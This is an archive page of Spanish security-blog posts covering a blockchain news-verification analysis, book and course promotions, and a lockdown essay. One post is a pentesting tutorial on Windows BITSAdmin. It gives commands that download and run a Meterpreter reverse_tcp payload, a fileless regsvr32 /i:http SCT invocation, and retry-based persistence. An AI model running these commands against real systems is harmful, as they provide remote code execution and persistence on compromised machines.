jueves, abril 30, 2020

Gremlin Botnets: El club de los poetas muertos en la RootedCON 11

En lo que va a de año no es que haya hecho muchas cosas en forma de eventos, que se pueda decir. En total, un par de conferencias, un podcast desde casa y un vídeo que grabé para dejar unas recomendaciones sobre libros de hacking y seguridad informática. Pero os las he traído todas por si son interesantes para vosotros.

Figura 1: Gremlin Botnets: El club de los poetas muertos en la RootedCON 11

El último que os debía era el vídeo de la conferencia sobre Gremlin Botnets que impartí en la RootedCON 11 en Madrid, el jueves 5 de Marzo de 2020, justo antes del confinamiento. Dura poco más de 40 minutos, y la tienes íntegra aquí.


Figura 2: Gremlin Botnets: "El club de los poetas muertos"

En esta charla hablé de las Gremlin Botnets, y tenéis publicados todos los artículos, con todas las explicaciones y la demos en vídeo en la siguiente lista de posts, por si te los quieres leer con calma.

Y ya os dejo por aquí el resto del material de este año, por si se te había escapado la conferencia que di en el Seminario de Ciberseguridad, la entrevista que me hicieron durante la C0r0n4con en el podcasts de "Cosas de Hackers", y el vídeo con los consejos para hackers y recomendaciones de libros de seguridad que os grabé este fin de semana.


Figura 3: Seminario de Ciberseguridad por Chema Alonso


Figura 4: Entrevista a Chema Alonso en "Cosas de Hackers"
por The XXLMan y José Manuel Ávalos Morer


Figura 5: 10 libros recomendados para hackers

Y esto es todo lo que os traigo hoy. Recordad que durante este periodo aún continúa el descuento de 0xWord durante el confinamiento, pero que está a punto de acabar, así que si quieres hacerte con algo de nuestro material, aprovecha ahora. No lo dejes más.


Saludos Malignos!

Autor: Chema Alonso (Contactar con Chema Alonso)


miércoles, abril 29, 2020

Combatir Fake News con Blockhain & Ethereum

En este periodo de confinamiento hemos visto muchas Fake News, algunas con falsas capturas de Twitter, falsas capturas de noticias, incluso usando la imagen de la Policía. Yo incluso tuve que pedir a mis amigos que dejaran de reenviar a nuestro grupo de WhatsApp todos los memes políticos con bulos, trozos extraídos y manipulados de intervenciones, aderezados con música y comentarios para camuflar una Fake New en forma de meme divertido.

Figura 1: Combatir Fake News con Blockhain & Ethereum

Sobre este tema, Covadonga Fernández, que es la Directora del diario Observatorio Blockchain y Blockchain Media y que además es consultora de Comunicación y tiene en su lista de actividades, haber sido organizadora del primer Meetup sobre Blockchain y Periodismo, hablo en su columna de Post2020.world sobre una iniciativa para verificar las noticias utilizando BlockChain sobre la plataforma Ethereum.

Figura 2: Contactar con Covadonga Fernández

La noticia me pareció curiosa, así que decidí dedicarle una entrada. Pero para hablar de estos temas, prefiero preguntar a Yaiza Rubio, que es un tema que domina perfectamente. De hecho, Yaiza Rubio es autora del libro "BitCoin: La tecnología BlockChain y su investigación", y dado muchas conferencias sobre BlockChain, por lo que le pedí que lo mirase a ver cómo funcionaba y que me diera su opinión.

Figura 3: Bitcoin: La tecnología BlockChain y su investigación
escrito por Yaiza Rubio y Felix Brezo en 0xWord

El resultado es este artículo que tenéis aquí, donde Yaiza explica cómo funciona esta iniciativa, que como veremos no es difícil de entender, y que, teniendo en cuenta que la mayoría de Fake News van en forma de memes y bulos anónimos por las redes sociales, lógicamente está lejos de cubrir todas las necesidades que como sociedad tenemos frente a esta amenaza de las Fake News. Os dejo el arículo.

Saludos Malignos!

Combatir Fake News en tiempos del COVID usando Ethereum

Ya hemos perdido la cuenta sobre la cantidad de bulos que están circulando por internet alrededor de la crisis sanitaria. De cara a minimizar su impacto, plataformas como WhatsApp anunció a primeros de mes que iba a implantar un límite al número de reenvío de mensajes, o Youtube limitó durante un tiempo la monetización de contenido relacionado con la pandemia.

Figura 4: Noticia sobre el sistema de ANSA

En la misma línea, ANSA, una agencia de noticias italiana, ha puesto en producción una funcionalidad disponible a través de su página web que permitiría:
“rastrear el historial de cada noticia, garantizando al lector la trazabilidad de los datos y la transparencia de la información, permitiendo así verificar la autenticidad de las fuentes de las noticias”. 
Veamos en qué consiste.

ANSAcheck, Notizia d’origine certificata

He seleccionado una noticia y pulsado sobre el botón de ANSAcheck. Parece que la noticia fue “expedida” el 27/04/2020 a las 13:14. A la cual se le genera un MD5. De la misma manera a su contenido. También nos informan que la noticia fue registrada el mismo día a las 13:16 y publicada unos minutos después a las 13:38. Sin embargo, manejan un concepto nuevo.

Ha sido registrada en el bloque AC202004271130. Un identificador interno cuyos primeros caracteres parecen corresponder a ANSAcheck. Los restantes parecen que corresponden con el año, el mes, el día y una hora de la que tampoco tenemos mucha más información de lo que podemos intuir que puede ser un registro sobre el instante antes a cuando registran dicha transacción en la cadena de bloques de Ethereum (11:31:31).

Figura 5: Información sobre la historia de la noticia

Según lo que se describe en su página web (por cierto, se echa de menos algún paper técnico), este sistema permitirá:
- Verificar la historia de una noticia y su fiabilidad volviendo a la fuente primaria. 
- Comparar las noticias leídas con la fuente de origen de la ANSA. 
- Permitir a los editores, agencias y medios de comunicación calificarlos en el mundo de la información como un proveedor de calidad aumentando la confianza del público.
También se afirma que todo esto es posible porque este proceso se activa en tres momentos diferentes:
- Cuando la noticia es creada por ANSA, la cadena de bloques registra su identificador para poder rastrear futuros eventos. 
- Cuando las noticias son modificadas o actualizadas por ANSA, también se registra el evento permitiendo el versionado transparente. 
- Cuando las noticias son grabadas por los editores participantes, también la cadena verifica la autenticidad de las noticias grabadas por ANSA, y registra el evento permitiendo la futura consulta de las noticias grabadas por el editor gracias a la etiqueta adhesiva ANSAcheck.
¿Qué se certifica con ANSAcheck?

Cuando pulsamos sobre el botón Certificado ANSAcheck, nos muestra el BLOCK ID, que se trata de un identificador interno y que se ancla en la cadena, el BLOCK HASH, otro identificador que también se ancla en la cadena de bloques, el TIMESTAMP, fecha en la que esa transacción fue minada, BLOCK HEIGHT, número del bloque en el que la transacción fue registrada, y TRANSACTION HASH, identificador único de 66 caracteres que se genera cada vez que se realiza una transacción.

Figura 6: Información del certificado de ANSA Check

El siguiente paso que se realiza es mostrar al usuario qué noticias van a ser empaquetadas bajo el BLOCK ID. Cada objeto de la lista que vemos a continuación representa una noticia y contiene información sobre un id, el título de la noticia, el hash del contenido, el tipo de evento (puede ser una publicación o una quote) y un timestamp (que no coincide con ninguno de los registrados anteriormente).

Figura 7: Información que contiene el BLOCK ID

La funcionalidad que más aporta desde el punto de vista de usuario (aunque serán los usuarios lo que opinen si realmente les aporta o no) es el proceso de verificación. En este sentido, se parte del BLOCK ID (AC202004271130) y se realizan las siguientes comprobaciones:
1. Se calcula el MD5 de la lista de noticias que están asociadas al contenido del BLOCK ID cuyo resultado es: 6eff33313a502b8f95696d9f176ff4fb. Recordemos que este valor es el que aparece codificado en el campo input data de la cadena junto al BLOCK ID.

2. Se llama al smartcontract de ANSAcheck para recuperar la información codificada en el campo input data.
Figura 8: Registro público del BLOCK ID y del hash de las noticias.
3. Y, finalmente, se comprueba si el hash generado a partir de la lista de noticias coincide con el anclado.
Conclusión

Este tipo de proyectos son un avance en el campo de la verificación de contenidos. Sin embargo, todavía manejamos conceptos complejos. En este sentido, sería muy interesante poder realizar algún tipo de investigación con usuarios de cara a validar si realmente los conceptos son interiorizados y les aportan algún tipo de valor.

Y, por otro lado, lo que nos está aportando esta solución es poder validar que un conjunto de noticias en un tiempo determinado fue el que se dice que es porque el hash de las noticias coincide con la prueba anclada. ¿Qué pasaría si el contenido de una noticia cambia en el tiempo o se demuestra que se ha cometido un error en ella?

Esta funcionalidad queda lejos de poder ofrecer una herramienta que permita verificar la historia de una noticia (que para eso podría utilizarse el concepto de merkle tree), evaluar la fiabilidad de una fuente (que el mundo de la inteligencia tiene bastante camino recorrido y está asociado a la fiabilidad de la información que ha sido aportada por una fuente en el pasado) y la credibilidad del contenido que estamos leyendo (que está asociado a cómo contrastamos la información).

Saludos,

Autor: Yaiza Rubio, Head of Network Tokenization en CDCO Telefónica y autora de los libros "Bitcoin: La tecnología BlockChain y su investigación", y el libro "Manual de ciberinvestigación en fuentes abiertas: OSINT para analistas". Puedes contactar directamente con Yaiza Rubio en su perfil en MyPublicInbox.

Contactar con Yaiza Rubio

martes, abril 28, 2020

Hacking Windows: BITSAdmin for Pentesters

Hoy venimos con un poco de pentesting y la herramienta BITSAdmin, una herramienta nativa de Windows que se encuentra con nosotros desde la versión XP del sistema operativo. Seguramente la puedas utilizar en muchos proyectos de Ethical Hacking, ya que como herramienta de post-explotación para hacer ciertas acciones viene bien.

Figura 1: Hacking Windows: BITSAdmin for Pentesters


Hoy os voy a hablar un poco de BITSAdmin ya que lo estoy preparando como dentro del conjunto de técnicas y herramientas que mostraré en un par de Hands on Lab que impartiré el 7 y 8 de Mayo y el 21 y 22 de Mayo. Estos hands on lab van de hacking y pentesting y recibirás el libro de Metasploit para pentesters Gold Edition y el de Ethical Hacking con el pack HACKING.

Figura 2: Metasploit para pentesters Gold Edition

El servicio Background Intelligent Transfer Service Admin permite crear descargas o subidas en forma de Jobs monitorizando su progreso. BITSAdmin, con la salida de Windows Vista, incorporó cabeceras HTTP personalizada, autenticación de cliente basada en certificados y soporte a IPv6. Para muchos es un gran desconocido, pero es una herramienta de línea de comandos que puede ser útil en un pentesting.

Con BITSAdmin se puede hacer descargas y subidas de ficheros a servidores HTTP y SMB. BITSAdmin puede pausar y reanudar las transferencias de archivos, incluso después de un reinicio. El uso que se le puede dar en un Ethical Hacking es, a priori, obvio, lograr descargar de forma sencilla algún tipo de archivo al equipo.

Figura 3: Ethical Hacking

Realmente, el uso que puede tener va más allá, logrando descargas de instrucción directas a memoria o al registro de Windows logrando un file-less. Otra opción que se puede hacer de BITSAdmin es lograr cierta persistencia, también en modo “disco” o en modo file-less.

Primeros pasos con BITS

BITS o BITSAdmin tiene una serie de parámetros, más de los que podemos pensar a priori. En un primer uso, si queremos hacer una descarga rápida podemos hacer uso del parámetro /transfer. Con este parámetro indicaremos un recurso remoto que queremos descargar y un destino donde almacenarlo. La sintaxis es:
Bitsadmin /transfer [nombre_job] http://[url] [destino local]
Por ejemplo:
 bitsadmin /transfer pablo_poc http://1.1.1.1/file.png c:\destino\file.png
Para copiar localmente ficheros también se puede llevar a cabo de manera muy sencilla mediante el uso de un job. Seguiremos los siguientes pasos:
- Creamos el job. Bitsadmin /create pablo_poc 
- Añadimos al job el origen y el destino. Bitsadmin /addfile pablo_poc [ruta1] [ruta2] 
- Ahora se inicia la transferencia con el parámetro “resume”. Bitsadmin /resume pablo_poc. 
- Finalizamos el trabajo. Bitsadmin /complete pablo_poc.
Start-BitsTransfer en Powershell

En Powershell se tiene de un cmdlet que se puede utilizar para hacer la transferencia de archivos de manera sencilla. No hace falta especificar el trabajo a crear, ni hacer referencia a él posteriormente. Solo con el parámetro Source y Destination es suficiente para hacer la transferencia.

Figura 4: Cmdlet para usar BitsTransfer en PowerShell

Aparte se puede utilizar bits indicando el tipo de transferencia con el parámetro denominado TransferType. Hay muchas opciones interesantes en su documentación. Por ejemplo, si hay que autenticarse en el servidor se puede utilizar la siguiente sintaxis:
Start-BitsTransfer -Credential Username\Domain -Source https://[URL] -Destination [Ruta] -ProxyUsage Override -ProxyList @(https://proxy1, 123.24.21.23, proxy3).
También se puede hacer uso de un fichero CSV que enumere los diferentes tipos de trabajos que deben ser realizados con BITS. La sintaxis es sencilla y sería:
Import-CSV [fichero con lista] | Start-BitsTransfer -TransferType Upload.
Figura 5: Documentación oficial de BITS

Tras ver algunas opciones de BITS vamos a avanzar con un caso práctico y sencillo que puede ser utilizado en el pentesting.

Transferencia de un binario y de un “file-less”

En este apartado vamos a ver dos ejemplos. El primero, muy gráfico, generamos un binario con Metasploit. Para generarlo podemos utilizar msfvenom o, directamente, utilizar el módulo payload/Windows/meterpreter/reverse_tcp, como se puede ver en la imagen.

Figura 6: Reverse_TCP con msfvenom

Con la opción generate -f exe -o [ruta volcar el EXE] se puede generar rápidamente un binario para un sistema Windows. Ahora, preparamos un handler para recibir la conexión resultante de la ejecución del binario anterior.

Figura 7: arrancado el handler

Esto lo mostramos de manera local, pero se puede extrapolar a una sesión remota que tuviéramos o cualquier acción necesaria en un momento determinado. Los pasos para lanzar el job y provocar la subida del binario sería:
1. Bitsadmin /create [nombre job]
2. Bitsadmin /addfile [nombre job] http://[url EXE] [ruta interna]
Figura 8: bitsadmin en PowerShell

Por último, hacemos uso de:
3. Bitsadmin /setnotifycmdline [nombre job] cmd.exe “/c bitsadmin /complete [nombre job] | start /B [ruta interna EXE].
La última instrucción lo que hace es delegar en la cmd e invocar el binario subido. La última instrucción puede ser un bitsadmin /resume [nombre job] lo que finalizará el proceso.

Figura 9: Delegación de la cmd

Tras ejecutar eso, producirse la descarga y ejecutarse el binario se obtiene una sesión en Metasploit, tal y como puede verse en la imagen. Hay que indicar que el binario, lógicamente, puede ser detectado por el antivirus, por lo que habría que jugar a la evasión previa.

Figura 10: Sesión de meterpreter conseguida

Ahora vamos con un segundo ejemplo. Ahora toca el turno de un payload de tipo file-less. Para ello la idea es, en vez de utilizar el handler de Metasploit es utilizar el web_delivery, también de Metasploit y que hemos utilizado mucho en el blog. La configuración de web_delivery es sencilla. Configuramos el módulo con Target a 3 para que nos genere un SCT y sea ejecutado posteriormente.

Figura 11: Configuración de web_delivery

Aquí se hace un pequeño “trick”. BITS necesita descargar algo, por lo que las dos primeras instrucciones las dejamos igual:
1. Bitsadmin /create [nombre job] 
2. Bitsadmin /addfile …
Ahora en el /SetNotifyCmdLine es donde le invocamos la instrucción que nos devolvió el módulo web_delivery. Quedaría así:
bitsadmin /setnotifycmdline [nombre job] 
    regsvr32.exe "/s /n /u /i:http://[ip_y_puerto]/dE8vICrV.sct scrobj.dll
Por último se invoca el bitsadmin /resume. Una técnica interesante de tipo “file-less”.

Persistencia

Por último vamos a hablar de la persistencia. BITSAdmin se puede utilizar para lograr cierta persistencia en el equipo comprometido, que es tan importante para poder tomar el control de un equipo o de varios en la red cuando se está en medio de un Hacking de Windows.

Figura 12: Hacking Windows

Para conseguir esa tan querida persistencia existen dos enfoques que se pueden emplear principalmente, y que serían:
1. Persistencia manual: en la que vamos a almacenar un fichero en el equipo y le vamos a programar un trabajo para que se ejecute cada X minutos. ¿Esto cómo funciona? Existe un parámetro en BITS que es “SetMinRetryDelay”. Esta opción fija cada cuando hay que reintentar un job o descarga que falla. El esquema es el siguiente:
o Creamos el trabajo con BITS. Lo hemos hecho antes. 
o Añadimos la descarga. Lo hemos hecho antes. Estas dos instrucciones son iguales a las anteriores. 
o Bitsadmin /SetNotifyCmdLine [nombre job] [ruta EXE]. Aquí ejecutamos el EXE descargado por el job. 
o Bitsdadmin /SetMinRetryDelay [nombre job] X. X es un valor en segundos.
o Bitsadmin /resume.
2. Enfoque fileless, que tanto nos gusta. La estrategia es muy similar a lo que hemos trabajado antes, es decir, utilizamos un SCT para ejecutar en memoria sin necesidad de tocar disco. Configuramos el web_delivery como se hizo antes y ejecutamos:
o Creamos el trabajo con BITS. Lo hemos hecho antes. 
o Añadimos la descarga. Lo hemos hecho antes. Estas dos instrucciones son iguales a las anteriores.
o bitsadmin /setnotifycmdline [nombre job] regsvr32.exe "/s /n /u /i:http://[ip_y_puerto]/dE8vICrV.sct scrobj.dll 
o Bitsdadmin /SetMinRetryDelay [nombre job] X. X es un valor en segundos.
o Bitsadmin /resume.
Como se puede ver el enfoque es el mismo, solo cambia la fuente del payload, si está en disco o si lo traemos directo a memoria en un momento determinado. Sin duda es una herramienta interesante que aporta en diferentes ámbitos del pentesting, tanto en ejecución de código como en la parte de persistencia puede ser utilizada. Necesario de conocer.

Saludos,

Autor: Pablo González Pérez (@pablogonzalezpe), escritor de los libros "Metasploit para Pentesters", "Hacking con Metasploit: Advanced Pentesting" "Hacking Windows", "Ethical Hacking", "Got Root",  “Pentesting con Powershell” y de "Empire: Hacking Avanzado en el Red Team", Microsoft MVP en Seguridad y Security Researcher en el equipo de "Ideas Locas" de la unidad CDCO de Telefónica.  Para consultas puedes usar el Buzón Público para contactar con Pablo González

Contactar con Pablo González

lunes, abril 27, 2020

Unos consejos para hackers, diez libros y tres cursos

El año 2015, después de recibir muchas peticiones de consejos para ser hacker, libros que estudiar, cursos, etcétera, realicé un vídeo durante el mes de Septiembre en que daba algunas recomendaciones. Cinco años después sigo recibiendo muchas preguntas similares, así que he grabado hoy otro vídeo y he dejado recomendados diez libros de 0xWord y por qué me parecen más que recomendables.

Figura 1: Unos consejos para hackers, diez libros y tres cursos

Espero que a alguien le sirva de utilidad esos veinte minutos que me he pasado grabando el vídeo, y que responda muchas de esas preguntas que se quedan sin contestar en todas las redes sociales, comentarios, etcétera. Aquí tenéis el vídeo.


Figura 2: 10 libros para hackers

Los libros que he recomendado, son los siguientes, por si te interesa conocer mi opinión de alguno de ellos en el vídeo o queréis más información de cada uno de ellos.

- Ethical Hacking de Pablo González
- Máxima Seguridad en Windows Gold Edition de Sergio de los Santos
- Hacking de Aplicaciones Web: SQL Injection 3ª Edición
- Hacking Web Technologies 2ª Edición
- Red Team de Eduardo Arriols
- Python para Pentesters de Daniel Echeverri
- Metasploit para Pentesters Gold Edition
- Pentesting con Kali 2ª Edición
- Hacking Windows: Ataques a sistemas y redes Microsoft
- Machine Learning aplicado a Cibersegurdiad

Al final, de lo que se trata es de que cada uno sepa como "hackear su futuro" por medio de aprender lo que le gusta hacer y lo que le falta para poder hacerlo. Ya os dije que en esta vida se trata de "soñar con los ojos abiertos", y aprender a auto-hackearse para ser root en tu vida.


Si alguno de los libros te interesan para "hackear tu futuro", rercordad que ahora aún está el descuento de 10% en todos los libros de 0xWord que lanzamos cuando comenzó el confinamiento. Este descuento estará activo hasta el día 30 de Abril.

Además durante este mes que viene hay tres Cursos Online de HackBySecurity que comienzan este mes de Mayo. El primero sobre la concienciación en seguridad informática para el 7 de Mayo, un segundo curso para formarse como pentester profesional el día 13 de Mayo y para los que quieran formarse en seguridad centrada en entornos de nube el tercer curso el día 25 de Mayo. Durante este periodo de confinamiento, puedes usar el código yomequedoencasa en la plataforma y conseguir un 30% de descuento en los cursos. Estos son:
- CCIT (Curso en Concienciación y Ciberseguridad IT): Este curso que comienza el 7 de Mayo es un acercamiento al mundo de la ciberseguridad, donde se le introducirán conceptos como ciberdelincuente, phishing, APT, malware, dispositivos móviles, los cuales aportarán al alumno una visión global de las posible amenazas y ciberataques que podrían ser perpetrados por un ciberdelincuente y cómo evitar y prevenir ser víctimas de estos actos. 
Figura 5: Como protegerse de los peligros en Internet
escrito por José Carlos Gallego Cano
Se adquieren conocimientos sobre los tipos de amenazas y ciberataques dentro del ámbito laboral. Qué son los ciberdelincuentes, cómo actúan y las técnicas que utilizan para llevar acabo estos ciberataques. Los diferentes mecanismos de protección y seguridad existentes para evitar y prevenir los ciberataques. Qué es, cómo se puede llevar a cabo y cómo protegerse de una campaña de phishing. Todos los asistentes recibirán el libro de "Cómo protegerse de los peligros en Internet".
- CSIO (Curso de Seguridad Informatica Ofensiva) : A partir del 13 de mayo da comienzo en este curso online de seguridad informática ofensiva donde el alumno adquirirá los conocimientos y habilidades necesarias para realizar pruebas de penetración y auditorías de seguridad informática pudiendo llegar a desempeñar puesto como el de hacker ético, pentester o auditor de ciberseguridad. Se le introducirán desde los conceptos de hacking básicos hasta la creación de sus propios exploits, pasando por las técnicas de ataque y herramientas más avanzadas y efectivas
Figura 6: Curso Online de Seguridad Informática Ofensiva
Además, el alumno tendrá como complemento del mismo el libro de Pentesting con Kali Linux. Este Curso Online de Seguridad Informática Ofensiva en HackBySecurity es una de las mejores opciones si lo que estás es buscando formarte profesionalmente para trabajar de pentester, y además quieres un modelo flexible de formación.
- CNCC (Ciberseguridad  y Normativa en Cloud Computing): El 25 de mayol da comienzo este curso, centrado en formar profesionales que sepan de seguridad en entornos de Cloud Computing. La computación en la nube ofrece inmensos beneficios potenciales en agilidad, flexibilidad y economía. Las organizaciones pueden moverse más rápido (ya que no tienen que comprar y aprovisionar hardware, y todo está definido por software), reducir el tiempo de inactividad (gracias a la elasticidad inherente y a otras características de la nube), y ahorrar dinero (debido a la reducción de los gastos de capital y una mejor vinculación entre la demanda y capacidad).  
Figura 7: Pentesting con Kali Linux 2ª Edición
El objetivo de este curso es proporcionar un lenguaje común y la comprensión de la computación en la nube para profesionales de la seguridad, destacando las diferencias entre la nube y la computación tradicional, y ayudar a orientar a los profesionales de seguridad hacia un enfoque de la adopción de la nube nativa que resulten en una mejor seguridad (y esos otros beneficios), en lugar de crear más riesgos. Todos los asistentes recibirán el libro de Pentesting con Kali 2ª Edición-.
Y esto es todo. Espero que disfrutes de aprender y se te pase el tiempo que tenemos que estar recluidos en casa de la forma más rápida y feliz posible, que es duro para todos pero vendrán tiempos mejores.

Saludos Malignos!

Autor: Chema Alonso (Contactar con Chema Alonso)


sábado, abril 25, 2020

Confinamiento

El café sabe amargo en mi taza de Winnie The Pooh. Podría haberle echado más azúcar, pero quiero que esté así, amargo. Cercano a como es en realidad. Cuando te vas haciendo mayor disfrutas más las cosas amargas. Las cosas que te traen un sabor a la boca menos dulce. Parece que disfrutas más de los matices menos camuflados de la existencia. Son más reales.

Figura 1: Confinamiento

El café sabe amargo, ya os lo he dicho. Podría haber elegido una taza de café "normal", pero entonces no cabría tanto. Y no quiero vivir la vida a sorbos. Y tampoco soy de pensar que solo hay una forma de hacer las cosas de manera “normal”. Nunca lo he sido. Me gusta pensar que eso no es ser hacker. También podría haber sacado una taza de Star Wars, de las grandes, pero esas son de mi colección.

Me apego a recuerdos. A mis pequeñas cosas que cuando las miro con la realidad aumentada de mi mirada están llenas de historias vivas que danzan frente a mis ojos. En 3D. Con música envolvente. Son casa. Son refugio. Me gusta alejarme un poco de ellos para crear nuevos recuerdos. Solo un poco. Para volver a disfrutarlos más. Y los objetos y recuerdos que vienen conmigo son yo. Son parte de mí, fueran dulces o amargos.

El café sabe amargo, pero no es intenso. Me gusta americano. Largo de agua. Aguachirri. Como lo pido siempre cuando quiero café. Sin leche. Largo como mi jornada laboral. Largo y amargo. Largo como mi pasado. Largo, espero, como mi futuro. Para sentir la experiencia durante más tiempo. Solo un poco más. Nada dura para siempre salvo en la memoria donde el tiempo se pliega. Como en la película esa de "Origen". Un sueño dentro de otro. Recursivo como los algoritmos. No se acaba. Ni lo dulce ni lo amargo. Pero el sabor del café es amargo. Y no quiero vestirlo de algo dulcificado echando mucha azúcar. Un poco para hacerlo más llevadero, puede, pero no mucho más maquillaje. Quiero sentir las cosas como son. Que duelan si tienen que doler. Que amarguen si tienen que amargar.

Mis ojos ya no son lo que eran. Están más cansaditos. Empiezan a pedir tregua de tanta lectura. De tantas letras en pantallas. De tantos mensajes que releí. De tantas y tantas hojas luchando contra mis párpados. De mi cerebro ávido por captar más de todo lo que se ve y lo que no se ve. De tantas luces en aventuras galácticas. Series de superhéroes. O de zombies que decoran el paisaje o antihéroes que van a acabar mal porque toman malas decisiones constantemente intentando avanzar. O porque la serie ya comenzó en un psiquiátrico como declaración de intenciones de lo que nos esperaba por delante.

Mis ojos ya no son lo que eran. Me piden ayuda. Mis ojos. Y se la doy a dosis pequeñas. No quiero que se acomoden. Aún no. Quiero que peleen por descifrar el mundo con sus propias herramientas. Pero de vez en cuando los consuelo. Les echo un poco de azúcar. Dejo que se acunen sobre el cristal de unas lupas de lectura. Para que aguanten más. Para que me descifren el mundo unos minutos más antes de caer rendido en la negrura de la noche.

El día es gris. Igual que ayer. Igual que el otro domingo que hizo buen día. Lo veo desde aquí. Mi sitio es el mismo que llevo ocupando durante este último mes y algo. Un rincón de la existencia con una ventana por la que veo solo un poquito del mundo analógico cuando mi foco se relaja. Solo una esquina de la vida. Por la que miro mientras me amargo mi paladar con el sabor del café. Con las gafas puestas para leer esa presentación con números y letras pequeñitas. Es mi vida. Casi enteramente mi vida es esto ahora.

El día es grande. O será que yo me siento pequeño. Como seguro que te sientes tú. Porque es como si me escondiera. Me siento un poco azul. No. No lo tomes mal. No me disgusta el color. Ni el gris ni el azul. La vida no es solo sol. La vida no es solo color amarillo. No solo luz. El azul es bonito también. Me gusta su olor. Su tacto. Y acurrucarme un rato con una de mis muchas bolitas azules. Esas que tengo en la estantería. Cojo una un rato. Me abrazo a ella. Retozo en mi sofá acurrucándola. O mirando al cielo con mi taza de Winnie The Pooh.

Mi cerebro vuela. Por el cielo. Sé que pronto saldré a jugar con las bolas amarillas. Sé que volveré a salir al parque a jugar con mis amigos. A gritar. A dar abrazos y besos. A ver un partido de fútbol. A ir a escuchar a los poetas rasgar sus guitarras. A sudar. A escuchar los gritos. A pegar los chillidos. A destrozar las canciones por no saber cantar. A mezclar el rojo con el amarillo. A mezclar el amarillo con el azul. A trepar por el monte con mi bicicleta cual motivado. A escuchar la música mientras vagabundeo en soledad por el mundo. Ese al que solo viajo yo. Por otros países. A irme a retozar con Morfeo sin tener que pelear por ello. Correr a sus brazos sin hacer cola en la frontera.

Mis palabras se amontonan. Están ahí. Guardadas. Para ti. Para las cenas. Para las charlas. Para las confesiones. Para los reencuentros. Para cuando las quieras oír. Para cuando las puedas escuchar de mi voz. Para que no sea algo digitalizado. Para que sea el sonido que emito con mis cuerdas vocales directamente. Ese que conecta directo con el motor de mi cuerpo. Ese que escribe cosas que nadie lee. Que nadie escucha. Que nadie le dicta. El inventor de los sentimientos. El pintor de las bolitas.

Mis caricias te extrañan. En los confines de mis dedos. Las noto palpitar cuando golpeo con suavidad las teclas de mi teclado. Cuando escribo algo para nadie. Pidiendo salir. Pidiendo espacio para ellas. Para que no duelan los dedos al final del día por el repiquetear constante. Para que el cansancio no sea solo mecánico sino también cuántico. Para que los dedos se muevan como olas al compás de dunas de ese desierto inmenso en soledad que queda por recorrer. Una vez más. Lentas. Eléctricas. Quemando. Como un calambre que sube por mis antebrazos y enciende el tatuaje imaginario de las llamas que nunca me hice.

La vida sigue escribiendo grietas en mi cara con tinta indeleble. En los surcos de mi piel. Donde guardo lo importante. Las risas. Los recuerdos. Los anhelos. Los planes inconclusos. Los conclusos. Con todos los metadatos. Con los recuerdos que he querido convertir en yo. En casa. Lo mejor de historia, de física y química. De arte. O incluso de filosofía sobre la vida que iba a tener pero que nunca tuve.

Mi pasado se perdió en este futuro. Porque de los mil caminos del multiverso el premio cayó en otra línea temporal. Porque la banda cambió el setlist por el camino. Porque fallé el pie de una estrofa. Porque no afinamos la canción en el mismo tempo. O porque mi diapasón se rompió por usarlo tanto a tanta velocidad. Y cada día puedo leerlos con más intensidad. Cuando me miro al espejo. Las canciones que salieron al final para el elepé son las que tengo escritas en mis arrugas. Pero aún me queda discografía que componer. Ouh, yeah!

Mis huesos me gritan. Cuando subo o bajo una escalera. Cuando recuerdo los golpes en la cadera al caerme de los patines. Cuando me levanto de la silla para preguntarle al sol qué hora es. Cuando pienso en todas las veces que necesito caerme aún. Cuando me veo volando sobre una tabla. Cuando recuerdo la negrura que viene tras la rampa. Cuando me despierto de la oscuridad y me están cosiendo la cabeza. Con sangre en los ojos. Cuando pienso en que el dolor no existe cuando el golpe es suficiente certero como para abrirte la cabeza. Y te quedas en calma para siempre. Mis huesos malvados me gritan. A veces bajito. Otras como lo hago yo cuando necesito quemar energía. O echar fuera todo.

Mi alma no te ve. No sabe donde estás. No sabe dónde te escondes. Donde se mete la gente cuando se acaba la conferencia. Donde te vas cuando acabo mi charla. Cuando me quito el gorro. Cuando ya no tengo el micrófono conectado. Cuando las fotos se acabaron. Donde estas ahora que mi mundo es este café amargo. Esta ventana analógica al mundo. Este sorbo tan pequeño de lo que es vivir. Donde todos los recuerdos bonitos de este confinamiento son solo terciopelo.

Mi televisión llora. Cuando da las noticias. Cuando dan números y números. Curvas. Gráficas. Tendencias. Nunca pensé que las matemáticas pudieran ser tan dolorosas. Cuando yo me presentaba a subir nota en matemáticas si sacaba menos de un notable. Y tengo que limpiar la pantalla con un pañuelo. Porque si no limpias las lágrimas se enraízan y ya no salen como el rocío. Y se congelan. Y el hielo corta los órganos blandos del interior. Los que están cerca de tu corazón.

Solo queda batirse. Y resistir. Y volver al mundo que está ahí fuera. Al círculo de tus brazos. Al calor de esa botella de vino. A abrazar a mi mamá con fuerza. A celebrar los cumpleaños, los santos, los acontecimientos que nos hemos saltado. A caerse al suelo y hacerse una herida en la rodilla tropezándose al correr lejos, muy lejos. A abollar el mundo saltando. A tumbarse exhausto al descender de la bicicleta por el calor, y meterse en una fuente para refrescarse del calor. A sentir cómo se te cuartea la piel con el aire y el sol de la montaña. A bucear buscando peces en mar. A chocar unas cervezas al aire con unos amigos en la barbacoa.

Saludos Malignos!

Autor: Chema Alonso (Contactar con Chema Alonso)


viernes, abril 24, 2020

III Encuentro Virtual de @0xWord: Formación en Ciberseguridad e IA

Hoy os traigo el III Encuentro Virtual de 0xWord que os he subido a  mi Canal Youtube. En estas reuniones a través de Internet durante esta época de confinamiento los participantes hablan de temas que tienen que ver con la especialidad de los profesionales que se juntan. En esta ocasión, el encuentro ha juntado a Amador Aparicio, Felipe Colorado, Fran Ramírez y Pablo González.

Figura 1: III Encuentro Virtual de 0xWord: Formación en Ciberseguridad e IA

Como sabéis, Pablo González ha enfocado su carrera a la ciberseguridad, especialmente en el área del Ethical Hacking, donde ha escrito muchos libros de 0xWord con esta temática, como son los libros de:


Pero también ha colaborado en otros títulos e incluso escrito una novela en la que mezclan acción y hacking como es Got Root que escribió junto a Felipe Colorado, otro de los participantes de este encuentro. Felipe, además de esa, ha publicado las novelas de Cluster y Crime Investigation, donde se narran aventuras basadas en el trabajo de los analistas forenses. Pero además tiene otras novelas más allá de 0xWord como son Baldur: El ocaso de III Reich y Om: La montaña roja.


Junto a ellos Amador Aparicio, que como sabéis es CSE (Chief Security Envoy) de ElevenPaths, Profesor de Informática en ciclos de nivel II y III donde forma a los chavales en ciberseguridad y hacking por medio de retos, y además es autor del libro de Hacking Web Technologies donde también participo yo.
Figura 3: Hacking Web Technolgies de Amador Aparicio,
Chema Alonso, Pablo González, Enrique Rando y Ricardo Martin
